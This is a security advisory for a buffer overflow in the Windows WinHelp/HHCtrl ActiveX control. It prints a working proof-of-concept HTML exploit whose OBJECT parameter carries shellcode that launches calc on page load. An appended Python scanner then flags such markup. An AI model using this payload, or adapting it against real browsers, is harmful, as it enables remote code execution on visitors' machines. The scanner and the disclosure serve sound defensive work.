Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
The following proof-of-concept code will open the calculator on the client system:

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0>
<PARAM NAME="Width" VALUE="26">
<PARAM NAME="Height" VALUE="26">
<PARAM NAME="Command" VALUE="WinHelp">
<PARAM NAME="Item1" VALUE="^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã3Ã?Phcalc^Ã4$ƒÃ?PV¸¯§éw^?Ã3Ã?P¾”^Ãéw^?Ã?AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGH^ÃÃ?^?ægMyWindow">
<PARAM NAME="Item2" VALUE="NGS Software LTD">
</OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
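
A content-inspection check for markup of the shape shown above, added here as an example and not part of the original advisory: it flags HHCtrl OBJECT elements whose WinHelp command carries an oversized Item parameter. The names HHCtrlScanner, scan_html and SAMPLE are hypothetical, and MAX_ITEM_LEN is an assumed triage threshold, since the page does not state the size of the affected buffer.

```python
from html.parser import HTMLParser

HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # classid used by the PoC on this page
MAX_ITEM_LEN = 64  # assumption: triage threshold, not the real buffer size
# Constructed sample: same element shape as the PoC, harmless filler as Item1.
SAMPLE = ('<OBJECT classid=clsid:' + HHCTRL_CLSID + ' id=winhelp><PARAM NAME="Command" '
          'VALUE="WinHelp"><PARAM NAME="Item1" VALUE="' + "A" * 300 + '">'
          '<PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT>')

class HHCtrlScanner(HTMLParser):
    """Flags HHCtrl objects whose WinHelp command carries a suspicious Item."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (object id, param name, value length)
        self._obj = None    # HHCtrl object currently being read, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            self._flush()  # an unclosed earlier object still gets evaluated
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            if clsid == HHCTRL_CLSID:
                self._obj = {"id": a.get("id", ""), "command": "", "items": {}}
        elif tag == "param" and self._obj is not None:
            name, value = a.get("name", "").lower(), a.get("value", "")
            if name == "command":  # keep the verb, drop anything after a comma
                self._obj["command"] = value.split(",")[0].strip().lower()
            elif name.startswith("item"):
                self._obj["items"][name] = value

    def handle_endtag(self, tag):
        if tag == "object":
            self._flush()

    def _flush(self):
        obj, self._obj = self._obj, None
        if obj is not None and obj["command"] == "winhelp":
            for name, value in obj["items"].items():
                # Oversized values or embedded control characters are worth review.
                if len(value) > MAX_ITEM_LEN or any(ord(c) < 0x20 for c in value):
                    self.findings.append((obj["id"], name, len(value)))

def scan_html(html):
    scanner = HHCtrlScanner()
    scanner.feed(html)
    scanner.close()
    scanner._flush()  # covers an OBJECT that was never closed
    return scanner.findings
```

Calling scan_html(SAMPLE) reports the oversized Item1 and leaves the short Item2 alone.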